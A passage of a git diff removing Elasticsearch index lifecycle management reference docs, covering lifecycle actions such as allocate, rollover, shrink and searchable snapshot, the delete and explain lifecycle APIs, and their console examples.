- -Updates the index settings to change which nodes are allowed to host the index shards -and change the number of replicas. - -The allocate action is not allowed in the hot phase. -The initial allocation for the index must be done manually or via -<>. - -You can configure this action to modify both the allocation rules and number of replicas, -only the allocation rules, or only the number of replicas. -For more information about how {es} uses replicas for scaling, see -<>. See <> for more information about -controlling where {es} allocates shards of a particular index. - - -[[ilm-allocate-options]] -==== Options - -You must specify the number of replicas or at least one -`include`, `exclude`, or `require` option. -An empty allocate action is invalid. - -For more information about using custom attributes for shard allocation, -see <>. - -`number_of_replicas`:: -(Optional, integer) -Number of replicas to assign to the index. - -`include`:: -(Optional, object) -Assigns an index to nodes that have at least _one_ of the specified custom attributes. - -`exclude`:: -(Optional, object) -Assigns an index to nodes that have _none_ of the specified custom attributes. - -`require`:: -(Optional, object) -Assigns an index to nodes that have _all_ of the specified custom attributes. - -[[ilm-allocate-ex]] -==== Example - -The allocate action in the following policy changes the index's number of replicas to `2`. -The index allocation rules are not changed. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "allocate" : { - "number_of_replicas" : 2 - } - } - } - } - } -} --------------------------------------------------- - -[[ilm-allocate-assign-index-attribute-ex]] -===== Assign index to nodes using a custom attribute - -The allocate action in the following policy assigns the index to nodes -that have a `box_type` of _hot_ or _warm_. - -To designate a node's `box_type`, you set a custom attribute in the node configuration. -For example, set `node.attr.box_type: hot` in `elasticsearch.yml`. -For more information, see <>. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "allocate" : { - "include" : { - "box_type": "hot,warm" - } - } - } - } - } - } -} --------------------------------------------------- - -[[ilm-allocate-assign-index-multi-attribute-ex]] -===== Assign index to nodes based on multiple attributes - -The allocate action can also assign indices to nodes based on multiple node -attributes. The following action assigns indices based on the `box_type` and -`storage` node attributes. - -[source,console] ----- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "cold": { - "actions": { - "allocate" : { - "require" : { - "box_type": "cold", - "storage": "high" - } - } - } - } - } - } -} ----- - -[[ilm-allocate-assign-index-node-ex]] -===== Assign index to a specific node and update replica settings - -The allocate action in the following policy updates the index to have one replica per shard -and be allocated to nodes that have a `box_type` of _cold_. - -To designate a node's `box_type`, you set a custom attribute in the node configuration. -For example, set `node.attr.box_type: cold` in `elasticsearch.yml`. -For more information, see <>. 
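Purely for illustration, that attribute would appear in the node's
configuration like this:

[source,yaml]
----
# Custom node attribute matched by the allocate action's "require" rule below.
node.attr.box_type: cold
----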
- -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "allocate" : { - "number_of_replicas": 1, - "require" : { - "box_type": "cold" - } - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-delete.asciidoc b/docs/reference/ilm/actions/ilm-delete.asciidoc deleted file mode 100644 index f6e4c6323c9..00000000000 --- a/docs/reference/ilm/actions/ilm-delete.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[role="xpack"] -[[ilm-delete]] -=== Delete - -Phases allowed: delete. - -Permanently removes the index. - -[[ilm-delete-options]] -==== Options - -`delete_searchable_snapshot`:: -beta:[] -(Optional, Boolean) -Deletes the searchable snapshot created in the cold phase. -Defaults to `true`. -This option is applicable when the <> action is used in the cold phase. - -[[ilm-delete-action-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "delete": { - "actions": { - "delete" : { } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-forcemerge.asciidoc b/docs/reference/ilm/actions/ilm-forcemerge.asciidoc deleted file mode 100644 index ceed578c0d8..00000000000 --- a/docs/reference/ilm/actions/ilm-forcemerge.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[[ilm-forcemerge]] -=== Force merge - -Phases allowed: hot, warm. - -<> the index into -the specified maximum number of <>. - -This action makes the index <>. - -To use the `forcemerge` action in the `hot` phase, the `rollover` action *must* be present. -If no rollover action is configured, {ilm-init} will reject the policy. - -[NOTE] -The `forcemerge` action is best effort. It might happen that some of the -shards are relocating, in which case they will not be merged. - -[[ilm-forcemerge-options]] -==== Options - -`max_num_segments`:: -(Required, integer) -Number of segments to merge to. To fully merge the index, set to `1`. - -`index_codec`:: -(Optional, string) -Codec used to compress the document store. The only accepted value is -`best_compression`, which uses {wikipedia}/DEFLATE[DEFLATE] for a higher -compression ratio but slower stored fields performance. To use the default LZ4 -codec, omit this argument. -+ -WARNING: If using `best_compression`, {ilm-init} will <> -and then <> the index prior to the force merge. -While closed, the index will be unavailable for read or write operations. - -[[ilm-forcemerge-action-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "forcemerge" : { - "max_num_segments": 1 - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-freeze.asciidoc b/docs/reference/ilm/actions/ilm-freeze.asciidoc deleted file mode 100644 index abc5b4ce4a6..00000000000 --- a/docs/reference/ilm/actions/ilm-freeze.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[role="xpack"] -[[ilm-freeze]] -=== Freeze - -Phases allowed: cold. - -<> an index to minimize its memory footprint. - -IMPORTANT: Freezing an index closes the index and reopens it within the same API call. -This means that for a short time no primaries are allocated. -The cluster will go red until the primaries are allocated. 
-This limitation might be removed in the future. - -[[ilm-freeze-options]] -==== Options - -None. - -[[ilm-freeze-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "cold": { - "actions": { - "freeze" : { } - } - } - } - } -} --------------------------------------------------- - diff --git a/docs/reference/ilm/actions/ilm-migrate.asciidoc b/docs/reference/ilm/actions/ilm-migrate.asciidoc deleted file mode 100644 index b829aa68341..00000000000 --- a/docs/reference/ilm/actions/ilm-migrate.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ -[role="xpack"] -[[ilm-migrate]] -=== Migrate - -Phases allowed: warm, cold. - -Moves the index to the <> that corresponds -to the current phase by updating the <> -index setting. -{ilm-init} automatically injects the migrate action in the warm and cold -phases if no allocation options are specified with the <> action. -If you specify an allocate action that only modifies the number of index -replicas, {ilm-init} reduces the number of replicas before migrating the index. -To prevent automatic migration without specifying allocation options, -you can explicitly include the migrate action and set the enabled option to `false`. - -In the warm phase, the `migrate` action sets <> -to `data_warm,data_hot`. This moves the index to nodes in the -<>. If there are no nodes in the warm tier, it falls back to the -<>. - -In the cold phase, the `migrate` action sets -<> -to `data_cold,data_warm,data_hot`. This moves the index to nodes in the -<>. If there are no nodes in the cold tier, it falls back to the -<> tier, or the <> tier if there are no warm nodes available. - -The migrate action is not allowed in the hot phase. -The initial index allocation is performed <>, -and can be configured manually or via <>. - -[[ilm-migrate-options]] -==== Options - -`enabled`:: -(Optional, Boolean) -Controls whether {ilm-init} automatically migrates the index during this phase. -Defaults to `true`. - -[[ilm-enabled-migrate-ex]] -==== Example - -In the following policy, the allocate action is specified to reduce the number of replicas before {ilm-init} migrates the index to warm nodes. - -NOTE: Explicitly specifying the migrate action is not required--{ilm-init} automatically performs the migrate action unless you specify allocation options or disable migration. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "migrate" : { - }, - "allocate": { - "number_of_replicas": 1 - } - } - } - } - } -} --------------------------------------------------- - -[[ilm-disable-migrate-ex]] -==== Disable automatic migration - -The migrate action in the following policy is disabled and -the allocate action assigns the index to nodes that have a -`rack_id` of _one_ or _two_. - -NOTE: Explicitly disabling the migrate action is not required--{ilm-init} does not inject the migrate action if you specify allocation options. 
- -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "migrate" : { - "enabled": false - }, - "allocate": { - "include" : { - "rack_id": "one,two" - } - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-readonly.asciidoc b/docs/reference/ilm/actions/ilm-readonly.asciidoc deleted file mode 100644 index fbb51252687..00000000000 --- a/docs/reference/ilm/actions/ilm-readonly.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[role="xpack"] -[[ilm-readonly]] -=== Read only - -Phases allowed: warm. - -Makes the index <>. - -[[ilm-read-only-options]] -==== Options - -None. - -[[ilm-read-only-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "readonly" : { } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-rollover.asciidoc b/docs/reference/ilm/actions/ilm-rollover.asciidoc deleted file mode 100644 index c0d5659ba03..00000000000 --- a/docs/reference/ilm/actions/ilm-rollover.asciidoc +++ /dev/null @@ -1,203 +0,0 @@ -[role="xpack"] -[[ilm-rollover]] -=== Rollover - -Phases allowed: hot. - -Rolls over a target to a new index when the existing index meets one of the rollover conditions. - -IMPORTANT: If the rollover action is used on a <>, -policy execution waits until the leader index rolls over (or is -<>), -then converts the follower index into a regular index with the -<>. - -A rollover target can be a <> or an <>. -When targeting a data stream, the new index becomes the data stream's -<> and its generation is incremented. - -To roll over an <>, the alias and its write index -must meet the following conditions: - -* The index name must match the pattern '^.*-\\d+$', for example (`my-index-000001`). -* The `index.lifecycle.rollover_alias` must be configured as the alias to roll over. -* The index must be the <> for the alias. - -For example, if `my-index-000001` has the alias `my_data`, -the following settings must be configured. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy", - "index.lifecycle.rollover_alias": "my_data" - }, - "aliases": { - "my_data": { - "is_write_index": true - } - } -} --------------------------------------------------- - -[[ilm-rollover-options]] -==== Options - -You must specify at least one rollover condition. -An empty rollover action is invalid. - -`max_age`:: -(Optional, <>) -Triggers roll over after the maximum elapsed time from index creation is reached. -The elapsed time is always calculated since the index creation time, even if the -index origination date is configured to a custom date (via the -<> or -<> settings) - -`max_docs`:: -(Optional, integer) -Triggers roll over after the specified maximum number of documents is reached. -Documents added since the last refresh are not included in the document count. -The document count does *not* include documents in replica shards. - -`max_size`:: -(Optional, <>) -Triggers roll over when the index reaches a certain size. -This is the total size of all primary shards in the index. -Replicas are not counted toward the maximum index size. -+ -TIP: To see the current index size, use the <> API. -The `pri.store.size` value shows the combined size of all primary shards. 
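For instance, the following request (the index name is illustrative) returns
just that column for a single index:

[source,console]
----
GET _cat/indices/my-index-000001?v=true&h=index,pri.store.size
----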
-
-[[ilm-rollover-ex]]
-==== Example
-
-[[ilm-rollover-size-ex]]
-===== Roll over based on index size
-
-This example rolls the index over when it is at least 100 gigabytes.
-
-[source,console]
---------------------------------------------------
-PUT _ilm/policy/my_policy
-{
-  "policy": {
-    "phases": {
-      "hot": {
-        "actions": {
-          "rollover" : {
-            "max_size": "100GB"
-          }
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
-
-[[ilm-rollover-documents-ex]]
-===== Roll over based on document count
-
-This example rolls the index over when it contains at least one hundred million documents.
-
-[source,console]
---------------------------------------------------
-PUT _ilm/policy/my_policy
-{
-  "policy": {
-    "phases": {
-      "hot": {
-        "actions": {
-          "rollover" : {
-            "max_docs": 100000000
-          }
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
-
-[[ilm-rollover-age-ex]]
-===== Roll over based on index age
-
-This example rolls the index over if it was created at least 7 days ago.
-
-[source,console]
---------------------------------------------------
-PUT _ilm/policy/my_policy
-{
-  "policy": {
-    "phases": {
-      "hot": {
-        "actions": {
-          "rollover" : {
-            "max_age": "7d"
-          }
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
-
-[[ilm-rollover-conditions-ex]]
-===== Roll over using multiple conditions
-
-When you specify multiple rollover conditions,
-the index is rolled over when _any_ of the conditions are met.
-This example rolls the index over if it is at least 7 days old or at least 100 gigabytes.
-
-[source,console]
---------------------------------------------------
-PUT _ilm/policy/my_policy
-{
-  "policy": {
-    "phases": {
-      "hot": {
-        "actions": {
-          "rollover" : {
-            "max_age": "7d",
-            "max_size": "100GB"
-          }
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
-
-[[ilm-rollover-block-ex]]
-===== Rollover condition blocks phase transition
-
-The rollover action only completes if one of its conditions is met.
-This means that any subsequent phases are blocked until rollover succeeds.
-
-For example, the following policy deletes the index one day after it rolls over.
-It does not delete the index one day after it was created.
-
-[source,console]
---------------------------------------------------
-PUT /_ilm/policy/rollover_policy
-{
-  "policy": {
-    "phases": {
-      "hot": {
-        "actions": {
-          "rollover": {
-            "max_size": "50G"
-          }
-        }
-      },
-      "delete": {
-        "min_age": "1d",
-        "actions": {
-          "delete": {}
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
diff --git a/docs/reference/ilm/actions/ilm-searchable-snapshot.asciidoc b/docs/reference/ilm/actions/ilm-searchable-snapshot.asciidoc
deleted file mode 100644
index a0ab91229ac..00000000000
--- a/docs/reference/ilm/actions/ilm-searchable-snapshot.asciidoc
+++ /dev/null
@@ -1,67 +0,0 @@
-[role="xpack"]
-[[ilm-searchable-snapshot]]
-=== Searchable snapshot
-
-beta::[]
-
-Phases allowed: cold.
-
-Takes a snapshot of the managed index in the configured repository
-and mounts it as a searchable snapshot.
-If the managed index is part of a <>,
-the mounted index replaces the original index in the data stream.
-
-[NOTE]
-This action cannot be performed on a data stream's write index. Attempts to do
-so will fail. To convert the index to a searchable snapshot, first
-<> the data stream. This
-creates a new write index. Because the index is no longer the stream's write
-index, the action can then convert it to a searchable snapshot.
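For example, a manual rollover of a hypothetical data stream named `my-data-stream` is a single request (an illustrative sketch; the data stream name is an assumption):

[source,console]
--------------------------------------------------
POST my-data-stream/_rollover
--------------------------------------------------
// TEST[skip:illustrative example only]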
-Using a policy that makes use of the <> action -in the hot phase will avoid this situation and the need for a manual rollover for future -managed indices. - -By default, this snapshot is deleted by the <> in the delete phase. -To keep the snapshot, set `delete_searchable_snapshot` to `false` in the delete action. - -[[ilm-searchable-snapshot-options]] -==== Options - -`snapshot_repository`:: -(Required, string) -Specifies where to store the snapshot. -See <> for more information. - -`force_merge_index`:: -(Optional, Boolean) -Force merges the managed index to one segment. -Defaults to `true`. -If the managed index was already force merged using the -<> in a previous action -the `searchable snapshot` action force merge step will be a no-op. - -[NOTE] -The `forcemerge` action is best effort. It might happen that some of -the shards are relocating, in which case they will not be merged. -The `searchable_snapshot` action will continue executing even if not all shards -are force merged. - -[[ilm-searchable-snapshot-ex]] -==== Examples -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "cold": { - "actions": { - "searchable_snapshot" : { - "snapshot_repository" : "backing_repo" - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-set-priority.asciidoc b/docs/reference/ilm/actions/ilm-set-priority.asciidoc deleted file mode 100644 index 7f22bb64bdb..00000000000 --- a/docs/reference/ilm/actions/ilm-set-priority.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[role="xpack"] -[[ilm-set-priority]] -=== Set priority - -Phases allowed: hot, warm, cold. - -Sets the <> of the index as -soon as the policy enters the hot, warm, or cold phase. -Higher priority indices are recovered before indices with lower priorities following a node restart. - -Generally, indexes in the hot phase should have the highest value and -indexes in the cold phase should have the lowest values. -For example: 100 for the hot phase, 50 for the warm phase, and 0 for the cold phase. -Indices that don't set this value have a default priority of 1. - -[[ilm-set-priority-options]] -==== Options - -`priority`:: -(Required, integer) -The priority for the index. -Must be 0 or greater. -Set to `null` to remove the priority. - -[[ilm-set-priority-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "set_priority" : { - "priority": 50 - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-shrink.asciidoc b/docs/reference/ilm/actions/ilm-shrink.asciidoc deleted file mode 100644 index ab5e3fe38cf..00000000000 --- a/docs/reference/ilm/actions/ilm-shrink.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[role="xpack"] -[[ilm-shrink]] -=== Shrink - -Phases allowed: warm - -Sets an index to <> -and shrinks it into a new index with fewer primary shards. -The name of the new index is of the form `shrink-`. -For example, if the name of the source index is _logs_, -the name of the shrunken index is _shrink-logs_. - -The shrink action allocates all primary shards of the index to one node so it -can call the <> to shrink the index. -After shrinking, it swaps aliases that point to the original index to the new shrunken index. 
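For reference, the underlying operation is similar to calling the shrink index API directly. The following is a minimal sketch for a hypothetical `logs` index; when the shrink action runs, {ilm-init} performs the prerequisite steps (blocking writes and co-locating shards on one node) for you:

[source,console]
--------------------------------------------------
POST /logs/_shrink/shrink-logs
{
  "settings": {
    "index.number_of_shards": 1
  }
}
--------------------------------------------------
// TEST[skip:illustrative example only]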
-
-[IMPORTANT]
-If the shrink action is used on a <>,
-policy execution waits until the leader index rolls over (or is
-<>),
-then converts the follower index into a regular index with the
-<> action before performing the shrink operation.
-
-If the managed index is part of a <>,
-the shrunken index replaces the original index in the data stream.
-
-[NOTE]
-This action cannot be performed on a data stream's write index. Attempts to do
-so will fail. To shrink the index, first
-<> the data stream. This
-creates a new write index. Because the index is no longer the stream's write
-index, the action can resume shrinking it.
-Using a policy that makes use of the <> action
-in the hot phase will avoid this situation and the need for a manual rollover for future
-managed indices.
-
-[[ilm-shrink-options]]
-==== Shrink options
-`number_of_shards`::
-(Required, integer)
-Number of shards to shrink to.
-Must be a factor of the number of shards in the source index.
-
-
-[[ilm-shrink-ex]]
-==== Example
-
-[source,console]
---------------------------------------------------
-PUT _ilm/policy/my_policy
-{
-  "policy": {
-    "phases": {
-      "warm": {
-        "actions": {
-          "shrink" : {
-            "number_of_shards": 1
-          }
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
diff --git a/docs/reference/ilm/actions/ilm-unfollow.asciidoc b/docs/reference/ilm/actions/ilm-unfollow.asciidoc
deleted file mode 100644
index 0ad6173f827..00000000000
--- a/docs/reference/ilm/actions/ilm-unfollow.asciidoc
+++ /dev/null
@@ -1,58 +0,0 @@
-[role="xpack"]
-[[ilm-unfollow]]
-=== Unfollow
-
-Phases allowed: hot, warm, cold.
-
-Converts a {ref}/ccr-apis.html[{ccr-init}] follower index into a regular index.
-This enables the shrink, rollover, and searchable snapshot actions
-to be performed safely on follower indices.
-You can also use unfollow directly when moving follower indices through the lifecycle.
-Has no effect on indices that are not followers; phase execution just moves to the next action.
-
-[NOTE]
-This action is triggered automatically by the <>,
-<>, and
-<> actions when they are
-applied to follower indices.
-
-This action waits until it is safe to convert a follower index into a regular index.
-The following conditions must be met:
-
-* The leader index must have `index.lifecycle.indexing_complete` set to `true`.
-This happens automatically if the leader index is rolled over using the
-<> action, and can be set manually using
-the <> API.
-* All operations performed on the leader index have been replicated to the follower index.
-This ensures that no operations are lost when the index is converted.
-
-Once these conditions are met, unfollow performs the following operations:
-
-* Pauses indexing following for the follower index.
-* Closes the follower index.
-* Unfollows the leader index.
-* Opens the follower index (which at this point is a regular index).
-
-[[ilm-unfollow-options]]
-==== Options
-
-None.
- -[[ilm-unfollow-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "unfollow" : {} - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-wait-for-snapshot.asciidoc b/docs/reference/ilm/actions/ilm-wait-for-snapshot.asciidoc deleted file mode 100644 index 5a953417a64..00000000000 --- a/docs/reference/ilm/actions/ilm-wait-for-snapshot.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[role="xpack"] -[[ilm-wait-for-snapshot]] -=== Wait for snapshot - -Phases allowed: delete. - -Waits for the specified {slm-init} policy to be executed before removing the index. -This ensures that a snapshot of the deleted index is available. - -[[ilm-wait-for-snapshot-options]] -==== Options - -`policy`:: -(Required, string) -Name of the {slm-init} policy that the delete action should wait for. - -[[ilm-wait-for-snapshot-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "delete": { - "actions": { - "wait_for_snapshot" : { - "policy": "slm-policy-name" - } - } - } - } - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/ilm/apis/delete-lifecycle.asciidoc b/docs/reference/ilm/apis/delete-lifecycle.asciidoc deleted file mode 100644 index 51af2b30791..00000000000 --- a/docs/reference/ilm/apis/delete-lifecycle.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-delete-lifecycle]] -=== Delete lifecycle policy API -++++ -Delete policy -++++ - -Deletes an index lifecycle policy. - -[[ilm-delete-lifecycle-request]] -==== {api-request-title} - -`DELETE _ilm/policy/` - -[[ilm-delete-lifecycle-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -cluster privilege to use this API. For more information, see -<>. - -[[ilm-delete-lifecycle-desc]] -==== {api-description-title} - -Deletes the specified lifecycle policy definition. You cannot delete policies -that are currently in use. If the policy is being used to manage any indices, -the request fails and returns an error. - -[[ilm-delete-lifecycle-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the policy. 
- -[[ilm-delete-lifecycle-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-delete-lifecycle-example]] -==== {api-examples-title} - -The following example deletes `my_policy`: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} --------------------------------------------------- -// TEST - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _ilm/policy/my_policy --------------------------------------------------- -// TEST[continued] - -When the policy is successfully deleted, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- diff --git a/docs/reference/ilm/apis/explain.asciidoc b/docs/reference/ilm/apis/explain.asciidoc deleted file mode 100644 index 003d10af6c0..00000000000 --- a/docs/reference/ilm/apis/explain.asciidoc +++ /dev/null @@ -1,314 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-explain-lifecycle]] -=== Explain lifecycle API -++++ -Explain lifecycle -++++ - -Retrieves the current lifecycle status for one or more indices. For data -streams, the API retrieves the current lifecycle status for the stream's backing -indices. - -[[ilm-explain-lifecycle-request]] -==== {api-request-title} - -`GET /_ilm/explain` - -[[ilm-explain-lifecycle-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`view_index_metadata` or `manage_ilm` or both privileges on the indices being -managed to use this API. For more information, see <>. - -[[ilm-explain-lifecycle-desc]] -==== {api-description-title} - -Retrieves information about the index's current lifecycle state, such as -the currently executing phase, action, and step. Shows when the index entered -each one, the definition of the running phase, and information -about any failures. - -[[ilm-explain-lifecycle-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams, indices, and index aliases to target. -Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, use `_all` or `*`. - -[[ilm-explain-lifecycle-query-params]] -==== {api-query-parms-title} - -`only_managed`:: - (Optional, Boolean) Filters the returned indices to only indices that are managed by - {ilm-init}. - -`only_errors`:: - (Optional, Boolean) Filters the returned indices to only indices that are managed by - {ilm-init} and are in an error state, either due to an encountering an error while - executing the policy, or attempting to use a policy that does not exist. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-explain-lifecycle-example]] -==== {api-examples-title} - -The following example retrieves the lifecycle state of `my-index-000001`: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy", - "index.number_of_replicas": 0 - } -} - -GET /_cluster/health?wait_for_status=green&timeout=10s --------------------------------------------------- -// TEST - -////////////////////////// - -[source,console] --------------------------------------------------- -GET my-index-000001/_ilm/explain --------------------------------------------------- -// TEST[continued] - -When management of the index is first taken over by {ilm-init}, `explain` shows -that the index is managed and in the `new` phase: - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "my-index-000001": { - "index": "my-index-000001", - "managed": true, <1> - "policy": "my_policy", <2> - "lifecycle_date_millis": 1538475653281, <3> - "age": "15s", <4> - "phase": "new", - "phase_time_millis": 1538475653317, <5> - "action": "complete", - "action_time_millis": 1538475653317, <6> - "step": "complete", - "step_time_millis": 1538475653317 <7> - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:no way to know if we will get this response immediately] - -<1> Shows if the index is being managed by {ilm-init}. If the index is not managed by -{ilm-init} the other fields will not be shown -<2> The name of the policy which {ilm-init} is using for this index -<3> The timestamp used for the `min_age` -<4> The age of the index (used for calculating when to enter the next phase) -<5> When the index entered the current phase -<6> When the index entered the current action -<7> When the index entered the current step - -Once the policy is running on the index, the response includes a -`phase_execution` object that shows the definition of the current phase. -Changes to the underlying policy will not affect this index until the current -phase completes. 
- -[source,console-result] --------------------------------------------------- -{ - "indices": { - "test-000069": { - "index": "test-000069", - "managed": true, - "policy": "my_lifecycle3", - "lifecycle_date_millis": 1538475653281, - "lifecycle_date": "2018-10-15T13:45:21.981Z", - "age": "25.14s", - "phase": "hot", - "phase_time_millis": 1538475653317, - "phase_time": "2018-10-15T13:45:22.577Z", - "action": "rollover", - "action_time_millis": 1538475653317, - "action_time": "2018-10-15T13:45:22.577Z", - "step": "attempt-rollover", - "step_time_millis": 1538475653317, - "step_time": "2018-10-15T13:45:22.577Z", - "phase_execution": { - "policy": "my_lifecycle3", - "phase_definition": { <1> - "min_age": "0ms", - "actions": { - "rollover": { - "max_age": "30s" - } - } - }, - "version": 3, <2> - "modified_date": "2018-10-15T13:21:41.576Z", <3> - "modified_date_in_millis": 1539609701576 <4> - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:not possible to get the cluster into this state in a docs test] - -<1> The JSON phase definition loaded from the specified policy when the index -entered this phase -<2> The version of the policy that was loaded -<3> The date the loaded policy was last modified -<4> The epoch time when the loaded policy was last modified - -If {ilm-init} is waiting for a step to complete, the response includes status -information for the step that's being performed on the index. - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "test-000020": { - "index": "test-000020", - "managed": true, - "policy": "my_lifecycle3", - "lifecycle_date_millis": 1538475653281, - "lifecycle_date": "2018-10-15T13:45:21.981Z", - "age": "4.12m", - "phase": "warm", - "phase_time_millis": 1538475653317, - "phase_time": "2018-10-15T13:45:22.577Z", - "action": "allocate", - "action_time_millis": 1538475653317, - "action_time": "2018-10-15T13:45:22.577Z", - "step": "check-allocation", - "step_time_millis": 1538475653317, - "step_time": "2018-10-15T13:45:22.577Z", - "step_info": { <1> - "message": "Waiting for all shard copies to be active", - "shards_left_to_allocate": -1, - "all_shards_active": false, - "number_of_replicas": 2 - }, - "phase_execution": { - "policy": "my_lifecycle3", - "phase_definition": { - "min_age": "0ms", - "actions": { - "allocate": { - "number_of_replicas": 2, - "include": { - "box_type": "warm" - }, - "exclude": {}, - "require": {} - }, - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "version": 2, - "modified_date": "2018-10-15T13:20:02.489Z", - "modified_date_in_millis": 1539609602489 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:not possible to get the cluster into this state in a docs test] - -<1> Status of the step that's in progress. - -If the index is in the ERROR step, something went wrong while executing a -step in the policy and you will need to take action for the index to proceed -to the next step. Some steps are safe to automatically be retried in certain -circumstances. To help you diagnose the problem, the explain response shows -the step that failed, the step info which provides information about the error, -and information about the retry attempts executed for the failed step if it's -the case. 
- -[source,console-result] --------------------------------------------------- -{ - "indices": { - "test-000056": { - "index": "test-000056", - "managed": true, - "policy": "my_lifecycle3", - "lifecycle_date_millis": 1538475653281, - "lifecycle_date": "2018-10-15T13:45:21.981Z", - "age": "50.1d", - "phase": "hot", - "phase_time_millis": 1538475653317, - "phase_time": "2018-10-15T13:45:22.577Z", - "action": "rollover", - "action_time_millis": 1538475653317, - "action_time": "2018-10-15T13:45:22.577Z", - "step": "ERROR", - "step_time_millis": 1538475653317, - "step_time": "2018-10-15T13:45:22.577Z", - "failed_step": "check-rollover-ready", <1> - "is_auto_retryable_error": true, <2> - "failed_step_retry_count": 1, <3> - "step_info": { <4> - "type": "cluster_block_exception", - "reason": "index [test-000057/H7lF9n36Rzqa-KfKcnGQMg] blocked by: [FORBIDDEN/5/index read-only (api)", - "index_uuid": "H7lF9n36Rzqa-KfKcnGQMg", - "index": "test-000057" - }, - "phase_execution": { - "policy": "my_lifecycle3", - "phase_definition": { - "min_age": "0ms", - "actions": { - "rollover": { - "max_age": "30s" - } - } - }, - "version": 3, - "modified_date": "2018-10-15T13:21:41.576Z", - "modified_date_in_millis": 1539609701576 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:not possible to get the cluster into this state in a docs test] - -<1> The step that caused the error -<2> Indicates if retrying the failed step can overcome the error. If this -is true, {ilm-init} will retry the failed step automatically. -<3> Shows the number of attempted automatic retries to execute the failed -step. -<4> What went wrong diff --git a/docs/reference/ilm/apis/get-lifecycle.asciidoc b/docs/reference/ilm/apis/get-lifecycle.asciidoc deleted file mode 100644 index 005dad56fc5..00000000000 